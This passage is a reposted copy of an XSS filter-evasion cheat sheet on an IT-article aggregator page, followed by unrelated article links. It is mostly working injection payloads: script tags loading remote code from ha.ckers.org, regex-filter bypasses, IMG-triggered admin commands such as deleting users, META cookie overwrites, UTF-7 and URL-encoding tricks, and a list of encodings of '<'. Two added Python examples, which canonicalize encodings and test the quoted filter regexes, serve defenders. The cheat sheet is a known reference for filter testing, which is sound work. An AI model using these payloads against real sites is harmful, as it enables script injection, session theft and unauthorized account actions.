SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--></pre> <h2>PHP</h2> <div> Requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues: </div><pre><? echo('<SCR)';</pre><pre>echo('IPT>alert("XSS")</SCRIPT>'); ?></pre> <h2>IMG Embedded commands</h2> <div> This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... 
This is one of the lesser used but more useful XSS vectors: </div><pre><IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"></pre> <h3>IMG Embedded commands part II</h3> <div> This is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC=" "> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this): </div><pre>Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser</pre> <h2>Cookie manipulation</h2> <div> Admittedly this is pretty obscure but I have seen a few examples where <META is allowed and you can use it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc...): </div><pre><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"></pre> <h2>UTF-7 encoding</h2> <div> If the page that the XSS resides on doesn't provide a charset header, or the browser is set to UTF-7 encoding, it can be exploited with the following (thanks to Roman Ivanov for this one). Click here for an example (you don't need the charset statement if the user's browser is set to auto-detect and there are no overriding content-types on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode). 
This does not work in any modern browser without changing the encoding type, which is why it is marked as completely unsupported. Watchfire found this hole in Google's custom 404 script: </div><pre> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</pre> <h2>XSS using HTML quote encapsulation</h2> <div> This was tested in IE; your mileage may vary. For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of a regex filter "/<script[^>]+src/i": </div><pre><SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT></pre> <div> For performing XSS on sites that allow "<SCRIPT>" but don't allow "<script src..." by way of a regex filter "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i" (this is an important one, because I've seen this regex in the wild): </div><pre><SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT></pre> <div> Another XSS to evade the same filter, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i": </div><pre><SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT></pre> <div> Yet another XSS to evade the same filter, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i". 
I know I said I wasn't going to discuss mitigation techniques but the only thing I've seen work for this XSS example if you still want to allow <SCRIPT> tags but not remote script is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags): </div><pre><SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT></pre> <div> And one last XSS attack to evade "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i", using grave accents (again, doesn't work in Firefox): </div><pre><SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT></pre> <div> Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly: </div><pre><SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT></pre> <div> This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content: </div><pre><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT></pre> <h2>URL string evasion</h2> <div> Assuming "http://www.google.com/" is programmatically disallowed: </div> <h3>IP versus hostname</h3><pre><A HREF="http://66.102.7.147/">XSS</A></pre> <h3>URL encoding</h3><pre><A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A></pre> <h3>Dword encoding</h3> <div> (Note: there are other variations of Dword encoding - see the IP Obfuscation calculator below for more details): </div><pre><A HREF="http://1113982867/">XSS</A></pre> <h3>Hex encoding</h3> <div> The total size of each number allowed is somewhere in the neighborhood of 240 total characters, as you can see on the second digit, and since each hex number is between 0 and F the leading zero on the third hex quartet is not required: </div><pre><A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A></pre> <h3>Octal encoding</h3> <div> Again padding is allowed, although you must keep it above 4 total characters 
per class - as in class A, class B, etc...: </div><pre><A HREF="http://0102.0146.0007.00000223/">XSS</A></pre> <h3>Mixed encoding</h3> <div> Let's mix and match base encoding and throw in some tabs and newlines - why browsers allow this, I'll never know. The tabs and newlines only work if this is encapsulated with quotes: </div><pre><A HREF="h</pre><pre>tt p://6 6.000146.0x7.147/">XSS</A></pre> <h3>Protocol resolution bypass</h3> <div> (// translates to http:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like "(ht|f)tp(s)?://" (thanks to Ozh for part of this one). You can also change the "//" to "\\". You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL. </div><pre><A HREF="//www.google.com/">XSS</A></pre> <h3>Google "feeling lucky" part 1.</h3> <div> Firefox uses Google's "feeling lucky" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's "keyword:" protocol. You can concatenate several keywords by using something like the following "keyword:XSS+RSnake" for instance. This no longer works within Firefox as of 2.0. </div><pre><A HREF="//google">XSS</A></pre> <h3>Google "feeling lucky" part 2.</h3> <div> This uses a very tiny trick that appears to work in Firefox only, because of its implementation of the "feeling lucky" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. 
If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0: </div><pre><A HREF="http://ha.ckers.org@google">XSS</A></pre> <h3>Google "feeling lucky" part 3.</h3> <div> This uses a malformed URL that appears to work in Firefox and Opera only, because of their implementation of the "feeling lucky" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case "google"): </div><pre><A HREF="http://google:ha.ckers.org">XSS</A></pre> <h3>Removing cnames</h3> <div> When combined with the above URL, removing "www." will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly: </div><pre><A HREF="http://google.com/">XSS</A></pre> <h3>Extra dot for absolute DNS:</h3><pre><A HREF="http://www.google.com./">XSS</A></pre> <h3>JavaScript link location:</h3><pre><A HREF="javascript:document.location='http://www.google.com/'">XSS</A></pre> <h3>Content replace as attack vector</h3> <div> (Assuming "http://www.google.com/" is programmatically replaced with nothing.) I actually used a similar attack vector against several separate real world XSS filters by using the conversion filter itself (here is an example) to help create the attack vector (i.e. "java&#x09;script:" was converted into "java script:", which renders in IE, Netscape 8.1+ in secure site mode and Opera): </div><pre><A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A></pre> <h2>Character Encoding</h2> <div> All the possible combinations of the character "<" in HTML and in UTF-8. Most of these won't render out of the box, but many of them can get rendered in certain circumstances as seen above. 
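As an added example (not part of the cheat sheet or OWASP's own code), the following Python reduces every spelling of "<" listed in this section to the literal character using only the standard library, and generates the page's list rather than retyping it; it assumes nothing beyond the forms on the page.

```python
"""Added example (not from the OWASP page): canonicalize the spellings of "<"
listed in this section and see how many decoding passes a denylist filter
needs before it can match the literal character at all."""
import html
import re
from urllib.parse import unquote

# JavaScript string escapes as listed on the page: \x3c and \u003c forms.
JS_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")


def decode_js_escapes(s):
    """\\x3C and \\u003C -> '<' (the backslash forms at the end of the list)."""
    return JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def canonicalize(s, max_rounds=5):
    """Percent-decode, HTML-entity-decode (html.unescape already accepts the
    optional semicolon, leading zeros and the legacy &LT / &lt names) and
    JS-escape-decode, repeating until nothing changes, so that double
    encodings such as %253C or &amp;lt; also collapse to '<'."""
    for _ in range(max_rounds):
        nxt = decode_js_escapes(html.unescape(unquote(s)))
        if nxt == s:
            return s
        s = nxt
    return s


def contains_lt(s):
    """What a '<' denylist must actually test, once the input is canonical."""
    return "<" in canonicalize(s)


def page_forms():
    """The 70 spellings enumerated on the page, generated rather than typed:
    6 plain/percent/named forms, 12 decimal entities (0-5 leading zeros, with
    and without ';'), 48 hex entities (x/X, 3c/3C, same padding and ';'
    variants) and 4 JavaScript escapes."""
    forms = ["<", "%3C", "&lt", "&lt;", "&LT", "&LT;"]
    for pad in range(6):
        for semi in ("", ";"):
            forms.append(f"&#{'0' * pad}60{semi}")
    for x in "xX":
        for c in ("3c", "3C"):
            for pad in range(6):
                for semi in ("", ";"):
                    forms.append(f"&#{x}{'0' * pad}{c}{semi}")
    forms += ["\\x3c", "\\x3C", "\\u003c", "\\u003C"]
    return forms


if __name__ == "__main__":
    for f in page_forms():
        print(f"{f!r:>16} -> {canonicalize(f)!r}")
    print("double encoded %253C ->", canonicalize("%253C"))
```

Browsers decode each of these forms only in its own context (entities in HTML, percent escapes in URLs, backslash escapes inside JavaScript strings), so this fixpoint decoding is deliberately more aggressive than any single parser; it shows the burden a denylist carries rather than replacing contextual output encoding.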
</div><pre><</pre><pre>%3C</pre><pre>&lt</pre><pre>&lt;</pre><pre>&LT</pre><pre>&LT;</pre><pre>&#60</pre><pre>&#060</pre><pre>&#0060</pre><pre>&#00060</pre><pre>&#000060</pre><pre>&#0000060</pre><pre>&#60;</pre><pre>&#060;</pre><pre>&#0060;</pre><pre>&#00060;</pre><pre>&#000060;</pre><pre>&#0000060;</pre><pre>&#x3c</pre><pre>&#x03c</pre><pre>&#x003c</pre><pre>&#x0003c</pre><pre>&#x00003c</pre><pre>&#x000003c</pre><pre>&#x3c;</pre><pre>&#x03c;</pre><pre>&#x003c;</pre><pre>&#x0003c;</pre><pre>&#x00003c;</pre><pre>&#x000003c;</pre><pre>&#X3c</pre><pre>&#X03c</pre><pre>&#X003c</pre><pre>&#X0003c</pre><pre>&#X00003c</pre><pre>&#X000003c</pre><pre>&#X3c;</pre><pre>&#X03c;</pre><pre>&#X003c;</pre><pre>&#X0003c;</pre><pre>&#X00003c;</pre><pre>&#X000003c;</pre><pre>&#x3C</pre><pre>&#x03C</pre><pre>&#x003C</pre><pre>&#x0003C</pre><pre>&#x00003C</pre><pre>&#x000003C</pre><pre>&#x3C;</pre><pre>&#x03C;</pre><pre>&#x003C;</pre><pre>&#x0003C;</pre><pre>&#x00003C;</pre><pre>&#x000003C;</pre><pre>&#X3C</pre><pre>&#X03C</pre><pre>&#X003C</pre><pre>&#X0003C</pre><pre>&#X00003C</pre><pre>&#X000003C</pre><pre>&#X3C;</pre><pre>&#X03C;</pre><pre>&#X003C;</pre><pre>&#X0003C;</pre><pre>&#X00003C;</pre><pre>&#X000003C;</pre><pre>\x3c</pre><pre>\x3C</pre><pre>\u003c</pre><pre>\u003C</pre> </div> </div> </div> </div> </div>
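Returning to the "XSS using HTML quote encapsulation" section above, here is an added example (not the cheat sheet's own code) that runs the two quoted regexes over the page's seven vectors and, beside them, a small from-scratch tokenizer written to the HTML5 tag states, so a defender can see which attributes a current browser actually receives. It assumes only the regexes and vectors quoted on the page; the IE-era parsing some of those vectors were tested against differs from HTML5 on the `=">"` and grave-accent cases.

```python
"""Added example (not from the OWASP page): the two script-src regexes quoted
above against the page's own vectors, next to an HTML5-style start-tag
tokenizer that reports what a browser really sees."""
import re

# The two filter regexes quoted on the page.
SIMPLE_FILTER = re.compile(r"<script[^>]+src", re.IGNORECASE)
WILD_FILTER = re.compile(
    r'''<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src''',
    re.IGNORECASE,
)
WS = " \t\n\r\f"


def regex_blocks(markup, pattern=WILD_FILTER):
    """True if the given filter regex would reject this markup."""
    return pattern.search(markup) is not None


def start_tags(markup):
    """Return [(tag_name, {attr_name: value})] for every start tag, tokenized
    the way the HTML5 tokenizer does it (written from scratch, no library):
    a quoted value may contain '>', a stray '=' or quote becomes part of an
    attribute NAME, an unquoted value ends at whitespace or '>', and the text
    inside <script>/<style> is raw until the matching end tag."""
    tags, i, n = [], 0, len(markup)
    while i < n:
        if markup[i] != "<":
            i += 1
            continue
        i += 1
        if i < n and markup[i] in "/!?":           # end tag / comment (simplified: ends at first '>')
            j = markup.find(">", i)
            i = n if j < 0 else j + 1
            continue
        if i >= n or not markup[i].isalpha():      # a lone '<' is just text
            continue
        j = i
        while j < n and markup[j] not in WS + "/>":   # tag name state
            j += 1
        name, attrs, i = markup[i:j].lower(), {}, j
        while i < n and markup[i] != ">":          # before attribute name state
            if markup[i] in WS + "/":
                i += 1
                continue
            j = i + 1 if markup[i] == "=" else i   # a leading '=' joins the name
            while j < n and markup[j] not in WS + "/=>":  # attribute name state
                j += 1
            aname, i = markup[i:j].lower(), j
            while i < n and markup[i] in WS:       # after attribute name state
                i += 1
            value = ""
            if i < n and markup[i] == "=":         # before attribute value state
                i += 1
                while i < n and markup[i] in WS:
                    i += 1
                if i < n and markup[i] in "\"'":   # quoted value: '>' is allowed inside
                    q = markup.find(markup[i], i + 1)
                    q = n if q < 0 else q
                    value, i = markup[i + 1:q], q + 1
                else:                              # unquoted value
                    j = i
                    while j < n and markup[j] not in WS + ">":
                        j += 1
                    value, i = markup[i:j], j
            attrs.setdefault(aname, value)         # duplicate attribute: first one wins
        i += 1                                     # consume the closing '>'
        tags.append((name, attrs))
        if name in ("script", "style"):            # raw text state
            j = markup.lower().find("</" + name, i)
            i = n if j < 0 else j
    return tags


def script_sources(markup):
    """The src of every <script> start tag; None means an inline script."""
    return [a.get("src") for t, a in start_tags(markup) if t == "script"]


# The seven vectors quoted in the quote-encapsulation section of the page.
VECTORS = [
    '<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
    '<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
    '<SCRIPT a=">" \'\' SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
    '<SCRIPT "a=\'>\'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
    '<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
    '<SCRIPT a=">\'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
    '<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
]

if __name__ == "__main__":
    for v in VECTORS:
        print(f"simple={regex_blocks(v, SIMPLE_FILTER)!s:<5} wild={regex_blocks(v)!s:<5} "
              f"browser sees script src={script_sources(v)}  {v}")
```

The last vector is the one the page says cannot be stopped statically: the tokenizer correctly reports a single inline script with no src, because the remote reference only exists after document.write runs.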
</li> <li><a href="/article/1614.htm" title="【Linux命令】Linux工作中常用命令" target="_blank">【Linux命令】Linux工作中常用命令</a> <span class="text-muted">bit1129</span> <a class="tag" taget="_blank" href="/search/linux%E5%91%BD%E4%BB%A4/1.htm">linux命令</a> <div>不断的总结工作中常用的Linux命令 &nbsp; 1.查看端口被哪个进程占用 &nbsp; 通过这个命令可以得到占用8085端口的进程号,然后通过ps -ef|grep 进程号得到进程的详细信息 &nbsp; netstat -anp | grep 8085 &nbsp; 察看进程ID对应的进程占用的端口号 &nbsp; netstat -anp | grep 进程ID &</div> </li> <li><a href="/article/1741.htm" title="优秀网站和文档收集" target="_blank">优秀网站和文档收集</a> <span class="text-muted">白糖_</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%AB%99/1.htm">网站</a> <div>集成 Flex, Spring, Hibernate 构建应用程序 &nbsp; 性能测试工具-JMeter &nbsp; Hmtl5-IOCN网站 &nbsp; Oracle精简版教程网站 &nbsp; 鸟哥的linux私房菜 &nbsp; Jetty中文文档 &nbsp; 50个jquery必备代码片段 &nbsp; swfobject.js检测flash版本号工具</div> </li> <li><a href="/article/1868.htm" title="angular.extend" target="_blank">angular.extend</a> <span class="text-muted">boyitech</span> <a class="tag" taget="_blank" href="/search/AngularJS/1.htm">AngularJS</a><a class="tag" taget="_blank" href="/search/angular.extend/1.htm">angular.extend</a><a class="tag" taget="_blank" href="/search/AngularJS+API/1.htm">AngularJS API</a> <div>angular.extend 复制src对象中的属性去dst对象中. 支持多个src对象. 如果你不想改变一个对象,你可以把dst设为空对象{}: var object = angular.extend({}, object1, object2). 注意: angular.extend不支持递归复制. 
使用方法: angular.extend(dst, src); 参数: </div> </li> <li><a href="/article/1995.htm" title="java-谷歌面试题-设计方便提取中数的数据结构" target="_blank">java-谷歌面试题-设计方便提取中数的数据结构</a> <span class="text-muted">bylijinnan</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>网上找了一下这道题的解答,但都是提供思路,没有提供具体实现。其中使用大小堆这个思路看似简单,但实现起来要考虑很多。 以下分别用排序数组和大小堆来实现。 使用大小堆: import java.util.Arrays; public class MedianInHeap { /** * 题目:设计方便提取中数的数据结构 * 设计一个数据结构,其中包含两个函数,1.插</div> </li> <li><a href="/article/2122.htm" title="ajaxFileUpload 针对 ie jquery 1.7+不能使用问题修复版本" target="_blank">ajaxFileUpload 针对 ie jquery 1.7+不能使用问题修复版本</a> <span class="text-muted">Chen.H</span> <a class="tag" taget="_blank" href="/search/ajaxFileUpload/1.htm">ajaxFileUpload</a><a class="tag" taget="_blank" href="/search/ie6/1.htm">ie6</a><a class="tag" taget="_blank" href="/search/ie7/1.htm">ie7</a><a class="tag" taget="_blank" href="/search/ie8/1.htm">ie8</a><a class="tag" taget="_blank" href="/search/ie9/1.htm">ie9</a> <div>jQuery.extend({ handleError: function( s, xhr, status, e ) { // If a local callback was specified, fire it if ( s.error ) { s.error.call( s.context || s, xhr, status, e ); } </div> </li> <li><a href="/article/2249.htm" title="[机器人制造原则]机器人的电池和存储器必须可以替换" target="_blank">[机器人制造原则]机器人的电池和存储器必须可以替换</a> <span class="text-muted">comsci</span> <a class="tag" taget="_blank" href="/search/%E5%88%B6%E9%80%A0/1.htm">制造</a> <div> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 机器人的身体随时随地可能被外来力量所破坏,但是如果机器人的存储器和电池可以更换,那么这个机器人的思维和记忆力就可以保存下来,即使身体受到伤害,在把存储器取下来安装到一个新的身体上之后,原有的性格和能力都可以继续维持..... 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 另外,如果一</div> </li> <li><a href="/article/2376.htm" title="Oracle Multitable INSERT 的用法" target="_blank">Oracle Multitable INSERT 的用法</a> <span class="text-muted">daizj</span> <a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a> <div>转载Oracle笔记-Multitable INSERT 的用法 http://blog.chinaunix.net/uid-8504518-id-3310531.html 一、Insert基础用法 语法: &nbsp;&nbsp;&nbsp; Insert Into 表名 (字段1,字段2,字段3...) &nbsp;&nbsp;&nbsp; Values (值1,</div> </li> <li><a href="/article/2503.htm" title="专访黑客历史学家George Dyson" target="_blank">专访黑客历史学家George Dyson</a> <span class="text-muted">datamachine</span> <a class="tag" taget="_blank" href="/search/on/1.htm">on</a> <div>20世纪最具威力的两项发明——核弹和计算机出自同一时代、同一群年青人。可是,与大名鼎鼎的曼哈顿计划(第二次世界大战中美国原子弹研究计划)相 比,计算机的起源显得默默无闻。出身计算机世家的历史学家George Dyson在其新书《图灵大教堂》(Turing’s Cathedral)中讲述了阿兰&middot;图灵、约翰&middot;冯&middot;诺依曼等一帮子天才小子创造计算机及预见计算机未来</div> </li> <li><a href="/article/2630.htm" title="小学6年级英语单词背诵第一课" target="_blank">小学6年级英语单词背诵第一课</a> <span class="text-muted">dcj3sjt126com</span> <a class="tag" taget="_blank" href="/search/english/1.htm">english</a><a class="tag" taget="_blank" href="/search/word/1.htm">word</a> <div>always 总是 rice 水稻,米饭 before 在...之前 live 生活,居住 &nbsp; usual 通常的 early 早的 begin 开始 month 月份 &nbsp; year 年 last 最后的 east 东方的 high 高的 &nbsp; far 远的 window 窗户 world 世界 than 比...更 &nbsp; </div> </li> <li><a href="/article/2757.htm" title="在线IT教育和在线IT高端教育" target="_blank">在线IT教育和在线IT高端教育</a> <span class="text-muted">dcj3sjt126com</span> <a class="tag" taget="_blank" href="/search/%E6%95%99%E8%82%B2/1.htm">教育</a> <div>codecademy&nbsp; http://www.codecademy.com codeschool&nbsp; https://www.codeschool.com teamtreehouse&nbsp; http://teamtreehouse.com lynda http://www.lynda.com/ Coursera https://www.coursera.</div> </li> <li><a href="/article/2884.htm" title="Struts2 xml校验框架所定义的校验文件" target="_blank">Struts2 xml校验框架所定义的校验文件</a> <span class="text-muted">蕃薯耀</span> <a class="tag" taget="_blank" 
href="/search/Struts2+xml%E6%A0%A1%E9%AA%8C/1.htm">Struts2 xml校验</a><a class="tag" taget="_blank" href="/search/Struts2+xml%E6%A0%A1%E9%AA%8C%E6%A1%86%E6%9E%B6/1.htm">Struts2 xml校验框架</a><a class="tag" taget="_blank" href="/search/Struts2%E6%A0%A1%E9%AA%8C/1.htm">Struts2校验</a> <div>&nbsp; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; 蕃薯耀 2015年7月11日 15:54:59 星期六 http://fa</div> </li> <li><a href="/article/3011.htm" title="mac下安装rar和unrar命令" target="_blank">mac下安装rar和unrar命令</a> <span class="text-muted">hanqunfeng</span> <a class="tag" taget="_blank" href="/search/mac/1.htm">mac</a> <div>1.下载:http://www.rarlab.com/download.htm 选择 RAR 5.21 for Mac OS X 2.解压下载后的文件 tar -zxvf rarosx-5.2.1.tar 3.cd rar sudo install -c -o $USER unrar /bin #输入当前用户登录密码 sudo install -c -o $USER rar</div> </li> <li><a href="/article/3138.htm" title="三种将list转换为map的方法" target="_blank">三种将list转换为map的方法</a> <span class="text-muted">jackyrong</span> <a class="tag" taget="_blank" href="/search/list/1.htm">list</a> <div>&nbsp; 在本文中,介绍三种将list转换为map的方法: 1) 传统方法 假设有某个类如下 &nbsp;&nbsp; class Movie { private Integer rank; private String description; public Movie(Integer rank, String des</div> </li> <li><a href="/article/3265.htm" title="年轻程序员需要学习的5大经验" target="_blank">年轻程序员需要学习的5大经验</a> <span class="text-muted">lampcy</span> <a class="tag" taget="_blank" href="/search/%E5%B7%A5%E4%BD%9C/1.htm">工作</a><a class="tag" taget="_blank" href="/search/PHP/1.htm">PHP</a><a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E5%91%98/1.htm">程序员</a> <div>在过去的7年半时间里,我带过的软件实习生超过一打,也看到过数以百计的学生和毕业生的档案。我发现很多事情他们都需要学习。或许你会说,我说的不就是某种特定的技术、算法、数学,或者其他特定形式的知识吗?没错,这的确是需要学习的,但却并不是最重要的事情。他们需要学习的最重要的东西是“自我规范”。这些规范就是:尽可能地写出最简洁的代码;如果代码后期会因为改动而变得凌乱不堪就得重构;尽量删除没用的代码,并添加</div> </li> <li><a href="/article/3392.htm" title="评“女孩遭野蛮引产致终身不育 60万赔偿款1分未得”医腐深入骨髓" target="_blank">评“女孩遭野蛮引产致终身不育 60万赔偿款1分未得”医腐深入骨髓</a> <span 
class="text-muted">nannan408</span> <div>先来看南方网的一则报道: 再正常不过的结婚、生子,对于29岁的郑畅来说,却是一个永远也无法实现的梦想。从2010年到2015年,从24岁到29岁,一张张新旧不一的诊断书记录了她病情的同时,也清晰地记下了她人生的悲哀。   粗暴手术让人发寒   2010年7月,在酒店做服务员的郑畅发现自己怀孕了,可男朋友却联系不上。在没有和家人商量的情况下,她决定堕胎。   12月5日,</div> </li> <li><a href="/article/3519.htm" title="使用jQuery为input输入框绑定回车键事件 VS 为a标签绑定click事件" target="_blank">使用jQuery为input输入框绑定回车键事件 VS 为a标签绑定click事件</a> <span class="text-muted">Everyday都不同</span> <a class="tag" taget="_blank" href="/search/jsp/1.htm">jsp</a><a class="tag" taget="_blank" href="/search/input/1.htm">input</a><a class="tag" taget="_blank" href="/search/%E5%9B%9E%E8%BD%A6%E9%94%AE%E7%BB%91%E5%AE%9A/1.htm">回车键绑定</a><a class="tag" taget="_blank" href="/search/click/1.htm">click</a><a class="tag" taget="_blank" href="/search/enter/1.htm">enter</a> <div>假设如题所示的事件为同一个,必须先把该js函数抽离出来,该函数定义了监听的处理: &nbsp; function search() { //监听函数略...... } &nbsp; 为input框绑定回车事件,当用户在文本框中输入搜索关键字时,按回车键,即可触发search(): &nbsp; //回车绑定 $(&quot;.search&quot;).keydown(fun</div> </li> <li><a href="/article/3646.htm" title="EXT学习记录" target="_blank">EXT学习记录</a> <span class="text-muted">tntxia</span> <a class="tag" taget="_blank" href="/search/ext/1.htm">ext</a> <div>&nbsp; 1. 准备 &nbsp; (1) 官网:http://www.sencha.com/ &nbsp; 里面有源代码和API文档下载。 &nbsp; EXT的域名已经从www.extjs.com改成了www.sencha.com ,但extjs这个域名会自动转到sencha上。 &nbsp; (2)帮助文档: &nbsp; 想要查看EXT的官方文档的话,可以去这里h</div> </li> <li><a href="/article/3773.htm" title="mybatis3的mapper文件报Referenced file contains errors" target="_blank">mybatis3的mapper文件报Referenced file contains errors</a> <span class="text-muted">xingguangsixian</span> <a class="tag" taget="_blank" href="/search/mybatis/1.htm">mybatis</a> <div>最近使用mybatis.3.1.0时无意中碰到一个问题: The errors below were detected when validating the file &quot;mybatis-3-mapper.dtd&quot; via the file &quot;account-mapper.xml&quot;. 
In most cases these errors can be d</div> </li> </ul> </div> </div> </div> <div> <div class="container"> <div class="indexes"> <strong>按字母分类:</strong> <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a> </div> </div> </div> <footer id="footer" class="mb30 mt30"> <div class="container"> <div class="footBglm"> <a target="_blank" href="/">首页</a> - <a target="_blank" href="/custom/about.htm">关于我们</a> - <a target="_blank" href="/search/Java/1.htm">站内搜索</a> - <a target="_blank" href="/sitemap.txt">Sitemap</a> - <a target="_blank" href="/custom/delete.htm">侵权投诉</a> </div> <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved. 
<!-- <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>--> </div> </div> </footer> <!-- 代码高亮 --> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script> <link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/> <script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script> </body> </html>